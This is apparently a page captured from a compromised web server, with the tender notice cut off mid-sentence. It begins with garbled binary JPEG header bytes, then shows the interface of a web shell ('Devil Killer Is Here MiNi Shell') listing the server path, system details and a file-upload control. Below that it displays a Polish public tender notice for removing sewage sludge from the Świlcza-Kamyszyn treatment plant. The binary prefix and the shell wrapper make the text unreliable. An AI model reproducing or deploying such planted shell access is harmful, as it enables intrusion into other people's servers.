JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220309/0008093101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie komunalnych osadów ściekowych z oczyszczalni<br/>ścieków Świlcza-Kamyszyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD WODOCIĄGÓW I KANALIZACJI W ŚWILCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690227114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">168</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-072</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zwik@swilcza.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swilcza.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie komunalnych osadów ściekowych z oczyszczalni<br/>ścieków Świlcza-Kamyszyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-78b493ac-9fe5-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00080931</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032103/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór, transport i zagospodarowanie komunalnych osadów ściekowych z oczyszczalni ścieków Świlcza - Kamyszyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_swilcza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert (w<br/>tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty<br/>składające się na ofertę, o których mowa w SWZ i ustawie): Ofertę należy złożyć w sposób<br/>przewidziany w sekcji III.3.6. ogłoszenia. Ofertę wraz z załącznikami należy przesyłać drogą<br/>elektroniczną za pośrednictwem:https://platformazakupowa.pl/pn/gmina_swilcza (patrz: sekcja VIII.8.2<br/>ogłoszenia) 2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania<br/>ofert): W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień, podmiotowych<br/>środków dowodowych oraz przekazywanie informacji (innych niż wskazanych w pkt. 1) odbywa się<br/>elektronicznie za pośrednictwem poczty elektronicznej (e-mail). Adres poczty elektronicznej do<br/>komunikacji Wykonawców z Zamawiającym (email):<br/>zwik@swilcza.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Oferty(w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy , inne<br/>dokumenty składające się na ofertę, o których mowa w SWZ i ustawie):1) Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować (zalogować)<br/>się<br/>na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania<br/>informatycznego pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza. Ofertę wraz z<br/>załącznikami należy przesyłać drogą elektroniczną za pośrednictwem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza. W formularzu oferty Wykonawca zobowiązany jest<br/>podać adres poczty elektronicznej (e-mail), na którym prowadzona będzie korespondencja związana<br/>z postępowaniem.2) Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert, wielkości<br/>przesyłanych plików, odbierania dokumentów elektronicznych, zmiana lub wycofanie oferty oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce<br/>„Instrukcje dla Wykonawców” na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje3) ofertę sporządza się,pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym;4) w celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować<br/>zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod adresem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view5) jeżeli dokumenty<br/>elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,wraz z<br/>jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”;6)do oferty<br/>należy dołączyć dokumenty wymagane w ustawie oraz w SWZ, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz<br/>z plikami stanowiącymi ofertę;7) oferta może być złożona tylko do upływu terminu składania ofert;8)<br/>Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać<br/>złożonej oferty;9) dane postępowanie można wyszukać na Liście wszystkich postępowań pod<br/>adresem:<br/>https://platformazakupowa.pl ze strony głównej z zakładki Postępowania lub pod adresem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza klikając opcję Postępowania.2. Sposób komunikowania<br/>się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)1) w postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz przekazywanie<br/>informacji (innych niż wskazanych w ust. 1 odbywa się elektronicznie za pośrednictwem poczty<br/>elektronicznej (e-mail) lub poprzez Platformę, dostępną pod<br/>adresem: https://platformazakupowa.pl/pn/gmina_swilcza2) we wszelkiej korespondencji związanej z<br/>niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub<br/>numerem referencyjnym nadanym przez zamawiającego;3) adres poczty elektronicznej do<br/>komunikacji Wykonawców z Zamawiającym (e-mail): zwik@swilcza.com.pl; 4) za datę przekazania<br/>oświadczeń,wniosków, zawiadomień, podmiotowych środków dowodowych oraz informacji (innych niż<br/>wskazanych w pkt 1 przyjmuje się datę ich przekazania na platformie -<br/>https://platformazakupowa.pl/pn/gmina_swilcza lub wpłynięcia na adres poczty elektronicznej<br/>wskazany w pkt 3;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZWIK 37/03/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Przedmiotem zamówienia jest usługa polegająca na odbiorze, wywozie i zagospodarowaniu komunalnych osadów ściekowych, mechanicznie odwodnionych (kod odpadu: 19 08 05) z oczyszczalni ścieków Świlcza-Kamyszyn przez okres 8 miesięcy od podpisania umowy, w ilości około 2 800 ton (słownie: dwa tysiące osiemset ton).<br/>Wykonawca zobowiązany jest do podania w formularzu ofertowym rodzaju procesu odzysku, którym poddany będzie odebrany komunalny osad ściekowy.<br/>Wykonawca zobowiązany jest do posiadania ważnych zezwoleń (decyzji) właściwego organu na prowadzenie działalności w zakresie transportu odpadów oraz jeśli rodzaj procesu odzysku tego wymaga w zakresie odzysku i/lub unieszkodliwiania odpadów (w tym o kodzie: 19 08 05) zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami). W/w dokumenty muszą posiadać termin ważności obejmujący cały okres realizacji zamówienia. W przypadku gdy ważność w/w dokumentów wygasa w trakcie realizacji zamówienia,<br/>Wykonawca zobowiązany jest wypełnić w treści oferty oświadczenie deklarujące złożenie we właściwym czasie wniosku o przedłużenie ważności zezwolenia (decyzji) i uzyskanie stosownego nowego, prawomocnego zezwolenia (decyzji), tak aby zapewnić ciągłość ważności w/w dokumentów, a tym samym zapewnić ciągłość realizacji zamówienia w okresie od podpisania umowy do 31 grudnia 2022 r. Brak stosownych zezwoleń (decyzji) na etapie realizacji umowy będzie skutkował odstąpieniem od umowy zgodnie z wytycznymi z zawartymi w projekcie umowy.<br/>3.	Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:<br/>1)	odbioru osadów,<br/>2)	ustalenie ilości odbieranych komunalnych osadów ściekowych następować będzie przez zważenie na wadze samochodowej, przeprowadzone w atestowanym punkcie kontroli obustronnie uzgodnionym, znajdującym się na terenie gminy Świlcza (Zamawiający może wyrazić zgodę na ustalenie innego miejsca ważenia osadów w przypadku braku możliwości ustalenia takiego miejsca na terenie gminy Świlcza lub w innych przypadkach uniemożliwiających ich ważenie na terenie gminy Świlcza lub innego sposobu rozliczania ilości załadowanego osadu. W takich przypadkach wymagana jest pisemna zgoda Zamawiającego wyrażona na piśmie);<br/>3)	zapewnienia odbioru komunalnych osadów ściekowych w ciągu całego okresu trwania umowy, <br/>4)	zapewnienia naczep lub dostosowania samochodów do bezpośredniego, odbioru komunalnych osadów ściekowych spod prasy i bezpośredniego transportu do miejsca zagospodarowania, kontenery, naczepy szczelne (nie powodujące wycieków) posiadające ładowność i wytrzymałość przystosowaną do wywozu osadów i pozwalającą na ich odbiór w wymaganym przez Zamawiającego terminie),<br/>5)	zapewnienia utrzymania stanu nawierzchni dróg (Zamawiającego i publicznych) pod względem czystości w czasie trwania usługi,<br/>6)	wykonywania obowiązku w zakresie ewidencjonowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami (potwierdzania odbioru osadów ściekowych na kartach przekazania odpadów i prowadzenie innych stosownych dokumentów wynikających z ustawy z dnia 14 grudnia 2012 r. o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami) oraz rozporządzeniem Ministra Środowiska z dnia 6 lutego 2015 r. w sprawie komunalnych osadów ściekowych (Dz. U. z 2015 roku, poz. 257)).<br/>7)	przeprowadzenia procesu zagospodarowania komunalnych osadów ściekowych zgodnie z ustawą o odpadach oraz prawo ochrony środowiska,<br/>8)	udostępnienie niezbędnych danych umożliwiających prowadzenie ewidencji przez Zamawiającego oraz prowadzenie kart przekazania odpadów w formie elektronicznej.<br/>4.	Wykonawca zobowiązany jest również do:<br/>1)	posiadania i dostarczenia niezbędnych dokumentów:<br/>a)	wpisu do rejestru Bazy Danych o Odpadach (BDO) w zakresie działalności objętej przedmiotem zamówienia, odpowiedniego ważnego zezwolenia (decyzji) właściwego organu na prowadzenie działalności w zakresie transportu odpadów oraz jeśli rodzaj procesu odzysku tego wymaga w zakresie odzysku i/lub unieszkodliwiania odpadów (w tym o kodzie: 19 08 05) zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami) w ilości co najmniej odpowiadającej przedmiotowi postępowania;<br/>b)	jeśli rodzaj procesu odzysku tego wymaga niezbędnej dokumentacji gruntów, na których osady mają być stosowane, w tym wypis z rejestru ewidencji gruntów, badania gruntów przekazane przez wytwórcę osadów (Zamawiającego) oraz oświadczenie właściciela o wyrażeniu zgody na zastosowanie komunalnych osadów ściekowych i umów użyczenia lub dzierżawy gruntów w przypadku gruntów użyczonych lub dzierżawionych;<br/>Dokumentację, o której mowa w pkt b Wykonawca dostarczy minimum 3 tygodnie przed rozpoczęciem stosowania komunalnych osadów ściekowych na powierzchni gruntów wskazanych przez Wykonawcę.<br/>c)	oświadczenia Wykonawcy, że grunty, na których mają być stosowane komunalne osady ściekowe w celach określonych w art. 96 ust. 1 pkt 2, 3, 4, 5 oraz art. 27 ustawy z dnia 14 grudnia 2012 roku o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami) nie są objęte zakazami w myśl art. 96 ust. 12 cytowanej ustawy - niniejsze oświadczenie Wykonawca załącza do oferty, jeśli rodzaj procesu odzysku wymaga dysponowania gruntami, na których mają być stosowane komunalne osady ściekowe (Załącznik nr 5 do SWZ);<br/>d)	wykonywania obowiązku w zakresie ewidencjonowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami (potwierdzania odbioru osadów ściekowych na kartach przekazania odpadów i prowadzenie innych stosownych dokumentów wynikających z ustawy z dnia 14 grudnia 2012 r. o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami) oraz rozporządzeniem Ministra Środowiska z dnia 6 lutego 2015 r. w sprawie komunalnych osadów ściekowych (Dz. U. z 2015 r., poz. 257)).<br/>5.	Wykonawca przy realizacji zadania musi przestrzegać przepisów ustawy z dnia 14 grudnia 2012 roku o odpadach (jednolity tekst: Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami), rozporządzenia Ministra Środowiska z dnia 6 lutego 2015 roku w sprawie komunalnych osadów ściekowych (Dz. U. z 2015 roku, poz. 257) oraz ustawy Prawo ochrony środowiska z dnia 27 kwietnia 2001 roku (jednolity tekst: Dz. U. z 2021 r., poz. 1973 z późniejszymi zmianami).<br/>6.	W przypadku przeprowadzenia kontroli przez stosowne instytucje kontroli i nałożenia ewentualnych kar finansowych na Zamawiającego (jako na wytwórcę odpadów) wynikających z gospodarowania przez Wykonawcę komunalnymi osadami ściekowymi niezgodnie z warunkami zawartymi w umowie, Zamawiający obciąży finansowo Wykonawcę kwotą odpowiadającą wysokości nałożonej kary.<br/>7.	Zamawiający dopuszcza zagospodarowanie odpadów poprzez rolnicze zagospodarowanie.<br/>8.	Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa:<br/>•	ustawą z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2021 r., poz. 779 z późniejszymi zmianami), zwaną dalej „ustawa o odpadach”,<br/>•	ustawą Prawo ochrony środowiska z dnia 27 kwietnia 2001 roku (t.j. Dz. U. z 2021 r. poz.1973 z późniejszymi zmianami),<br/>•	rozporządzeniem Ministra Środowiska w sprawie komunalnych osadów ściekowych z dnia 06 lutego 2015 r. (Dz. U. z 2015 roku, poz. 257 ), zwanego dalej „Rozporządzeniem”,<br/>•	ustawą o transporcie drogowym z dnia 6 września 2001 r. (t.j. Dz. U. z 2021 r., poz.919 z późniejszymi zmianami),<br/>•	rozporządzeniem Ministra Środowiska z dnia 7 października 2016 roku w sprawie szczegółowych wymagań dla transportu odpadów (Dz.U. z 2016 r. poz. 1742).<br/>9.	Szczegółowy opis przedmiotu zamówienia:<br/>1)	uwodnienie, skład fizykochemiczny wg. badań wykonywanych z każdej partii osadu,<br/>2)	miejsce odbioru osadu – Gminna Oczyszczalnia Ścieków Świlcza-Kamyszyn,<br/>3)	termin realizacji 7 dni od momentu zgłoszenia przez Zamawiającego,<br/>4)	częstotliwość odbioru – co 2 miesiące przez okres 2-3 dni, <br/>5)	załadunek oraz ważenie odpadu po Stronie Zamawiającego,<br/>6)	odbiór komunalnych osadów ściekowych z oczyszczalni polegał będzie na podstawieniu naczepy samochodowej pod podajnik transportujący osad, odbiorze pełnej naczepy i podstawienie w jej miejsce pustej. W przypadku braku możliwości odbioru naczepy z osadem, osad będzie składowany na pryzmie pod wiatą a następnie ładowany ładowarką i wywieziony. W okresie zimowym jeżeli warunki atmosferyczne nie będą pozwalały na zagospodarowanie i wykorzystanie rolnicze osadów, osad będzie składowany na oczyszczalni ścieków.<br/>7)	sposób rozliczenia wywozu – zagospodarowania osadu – na podstawie masy osadu, KPO sporządzonej w BDO,<br/>8)	Zamawiający powiadamia Wykonawcę na 7 dni przed planowanym terminem wywozu osadu.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków<br/>Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90510000-5 - Usuwanie i obróbka odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90513600-2 - Usługi usuwania osadów</p> <p class="mb-0">90513700-3 - Usługi transportu osadów</p> <p class="mb-0">90513800-4 - Usługi obróbki osadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 13.	PRAWO OPCJI:<br/>1)	Zamawiający przy realizacji przedmiotu zamówienia przewiduje możliwość zastosowania<br/>prawa opcji na podstawie art. 441 ust. 1 ustawy Prawo zamówień publicznych. W związku<br/>z tym przedmiot zamówienia w niniejszym postępowaniu podzielony został na zamówienie<br/>podstawowe (gwarantowane) oraz zamówienie objęte prawem opcji. Zakres zamówienia<br/>podstawowego opisany został w pkt 2. Podana w nim ilość jest wielkością minimalną,<br/>którą należy wycenić w Ofercie. W sytuacji, gdy ilość osadów ściekowych z oczyszczalni ścieków Świlcza-Kamyszyn przewidziana do odbioru, transportu i zagospodarowania komunalnych osadów ściekowych z oczyszczalni ścieków Świlcza-Kamyszyn w ramach zamówienia podstawowego okaże się niewystarczająca, Zamawiającemu przysługuje uprawnienie do skorzystania z prawa opcji, co oznacza możliwość:<br/>a)	zwiększenia zakresu zamówienia do 50 % łącznej ilości osadów ściekowych przewidzianych do odbioru, transportu i zagospodarowania komunalnych osadów ściekowych z oczyszczalni ścieków Świlcza-Kamyszyn, o której mowa w pkt 2 lub<br/>b)	zwiększenia zakresu zamówienia do 50 % łącznej ilości osadów ściekowych przewidzianych do odbioru, transportu i zagospodarowania komunalnych osadów ściekowych z oczyszczalni ścieków Świlcza-Kamyszyn, o której mowa w pkt 2 z jednoczesnym wydłużeniem terminu realizacji umowy maksymalnie o 2 miesiące.<br/>2)	Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma<br/>obowiązku skorzystać w czasie trwania umowy. W przypadku nieskorzystania przez<br/>Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Uruchomienie opcji przez Zamawiającego skutkuje po stronie Wykonawcy obowiązkiem jej<br/>wykonania.<br/>3)	W przypadku, gdy będzie to leżeć w interesie Zamawiającego i wynikać z jego bieżących<br/>potrzeb, Zamawiający zastrzega możliwość wielokrotnego korzystania z prawa opcji, po<br/>zrealizowaniu zakresu podstawowego zamówienia, o którym mowa w ust. 2 aż do<br/>wyczerpania maksymalnego zakresu dla danej części zamówienia wynikającego z prawa opcji.<br/>4)	Zamawiający zastrzega, że zamówienie wynikające z prawa opcji realizowane będzie na<br/>warunkach zamówienia podstawowego (zgodnie z SWZ, Ofertą Wykonawcy i Projektem<br/>umowy stanowiącym Załącznik nr 4 do SWZ). W przypadku skorzystania przez Zamawiającego<br/>z prawa opcji, wynagrodzenie Wykonawcy zostanie wyliczone na podstawie cen<br/>jednostkowych wskazanych w Ofercie Wykonawcy.<br/>5)	W celu uruchomienia opcji:<br/>a)	Zamawiający przygotowuje Oświadczenie wyrażające wolę skorzystania z prawa opcji<br/>określające zakres usług koniecznych do wykonania,<br/>b)	oświadczenie, o którym mowa w pkt a) musi zostać zaakceptowane przez księgową<br/> w celu potwierdzenia dysponowania środkami finansowymi przeznaczonymi na<br/>realizację opcji a następnie zatwierdzone przez Kierownika Zamawiającego lub osobę<br/>przez niego upoważnioną,<br/>c)	Zamawiający przekazuje Wykonawcy, w formie pisemnej, oświadczenie, o którym mowa<br/>w pkt b), nie później niż 14 dni przed terminem realizacji usługi objętej prawem 